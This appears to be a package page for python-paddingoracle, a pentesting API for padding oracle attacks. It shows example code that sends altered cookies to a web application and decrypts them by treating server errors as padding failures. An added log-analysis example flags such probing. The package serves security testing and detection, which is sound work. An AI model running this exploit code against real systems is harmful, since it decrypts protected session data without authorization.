
A portable, padding oracle exploit API

Project description

python-paddingoracle is an API that provides pentesters a customizable alternative to PadBuster and other padding oracle exploit tools that can’t easily (without a heavy rewrite) be used in unique, per-app scenarios. Think non-HTTP applications, raw sockets, client applications, unique encodings, etc.

Usage:

To use the paddingoracle API, subclass PaddingOracle, implement its oracle() method, and raise a BadPaddingException whenever the target's decryption routine reveals a padding error. To decrypt data, pass the raw encrypted bytes to decrypt() together with a block size (typically 8 or 16) and an optional iv parameter.

See below for an example (taken from the project's example code):

from __future__ import print_function

from paddingoracle import BadPaddingException, PaddingOracle
from base64 import b64encode, b64decode
from urllib import quote, unquote
import logging
import requests
import socket
import time


class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        # Seconds to wait before retrying a failed request
        self.wait = kwargs.get('wait', 2.0)

    def oracle(self, data, **kwargs):
        # Encode the candidate ciphertext exactly as the application expects it
        somecookie = quote(b64encode(data))
        self.session.cookies['somecookie'] = somecookie

        while 1:
            try:
                response = self.session.get('http://www.example.com/',
                        stream=False, timeout=5, verify=False)
                break
            except (socket.error, requests.exceptions.RequestException):
                logging.exception('Retrying request in %.2f seconds...',
                                  self.wait)
                time.sleep(self.wait)
                continue

        self.history.append(response)

        if response.ok:
            logging.debug('No padding exception raised on %r', somecookie)
            return

        # An HTTP 500 error was returned, likely due to incorrect padding
        raise BadPaddingException


if __name__ == '__main__':
    import sys

    if not sys.argv[1:]:
        print('Usage: %s <somecookie value>' % (sys.argv[0], ))
        sys.exit(1)

    logging.basicConfig(level=logging.DEBUG)

    encrypted_cookie = b64decode(unquote(sys.argv[1]))

    padbuster = PadBuster()

    cookie = padbuster.decrypt(encrypted_cookie, block_size=8, iv=bytearray(8))

    print('Decrypted somecookie: %s => %r' % (sys.argv[1], cookie))
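The oracle() above distinguishes padding validity by HTTP status: every query changes the somecookie value and a 500 means bad padding, so an application with this weakness leaves a characteristic trace in its access logs. The following is an added detection example, not part of python-paddingoracle; the log format (combined log with the somecookie value appended as a last field), the sample lines and the thresholds are all constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed access-log sample (combined-log style, somecookie value appended; not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "somecookie=dGVzdA%3D%3D"',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /profile HTTP/1.1" 200 2048 "somecookie=dGVzdA%3D%3D"',
] + [
    # One client cycling through many cookie values on one URL, nearly all of
    # which the application rejects with a 500: the trace an oracle query loop leaves.
    '203.0.113.7 - - [01/Jan/2024:10:01:%02d +0000] "GET / HTTP/1.1" %d 0 "somecookie=%s"'
    % (i, 200 if i == 11 else 500, 'probe%03d' % i)
    for i in range(16)
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "somecookie=(?P<cookie>[^"]*)"$')

def parse_line(line):
    """Return (ip, path, status, cookie) or None if the line does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return m.group('ip'), m.group('path'), int(m.group('status')), m.group('cookie')

def find_oracle_probing(lines, min_requests=10, min_error_ratio=0.8, min_distinct=8):
    """Flag (ip, path) pairs with many requests, mostly 5xx, over many distinct cookie values."""
    stats = defaultdict(lambda: {'total': 0, 'errors': 0, 'cookies': set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # unparseable line: skip rather than abort the scan
        ip, path, status, cookie = parsed
        s = stats[(ip, path)]
        s['total'] += 1
        s['errors'] += 1 if 500 <= status < 600 else 0
        s['cookies'].add(cookie)
    flagged = []
    for (ip, path), s in sorted(stats.items()):
        if (s['total'] >= min_requests
                and s['errors'] / float(s['total']) >= min_error_ratio
                and len(s['cookies']) >= min_distinct):
            flagged.append((ip, path, s['total'], s['errors'], len(s['cookies'])))
    return flagged

if __name__ == '__main__':
    for hit in find_oracle_probing(SAMPLE_LOG):
        print('%s %s: %d requests, %d server errors, %d distinct cookies' % hit)
```

The thresholds are deliberately loose; in production, tune them to the application's normal 5xx rate and remember that a fixed error response (same status and body for bad MAC and bad padding) removes the signal the tool relies on.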

Credits

python-paddingoracle is a Python implementation heavily based on PadBuster, an automated script for performing Padding Oracle attacks, developed by Brian Holyfield of Gotham Digital Science.

Download files

Download the file for your platform.

Source Distribution

paddingoracle-0.2.2.tar.gz (5.3 kB)

Built Distribution

paddingoracle-0.2.2-py2-none-any.whl (5.6 kB, Python 2)

File details

Details for the file paddingoracle-0.2.2.tar.gz.

File metadata

  • Download URL: paddingoracle-0.2.2.tar.gz
  • Size: 5.3 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No

File hashes

Hashes for paddingoracle-0.2.2.tar.gz

Algorithm    Hash digest
SHA256       bfa836e7a9971484f6b44ad61972ed81adc58a1c4d1ecc11e090fa1e8849803d
MD5          f59e537b890a0ba6cbfaa9bd68dc5d50
BLAKE2b-256  748db12a6ce3e5e5f77a2d8513ae4f45b925741e83c5a116f6fbc79f987a5507

File details

Details for the file paddingoracle-0.2.2-py2-none-any.whl.

File hashes

Hashes for paddingoracle-0.2.2-py2-none-any.whl

Algorithm    Hash digest
SHA256       0a2432d8911f9d2e31d261585dba3af571b7d2e71971cb731360a25ccbeda8c2
MD5          eb6224f3fdda27a7b3c6d9f21f7c8541
BLAKE2b-256  4846198eaee3113990344c8260e9fca87e573d83fe08ca24db1d15a59cb3df8f
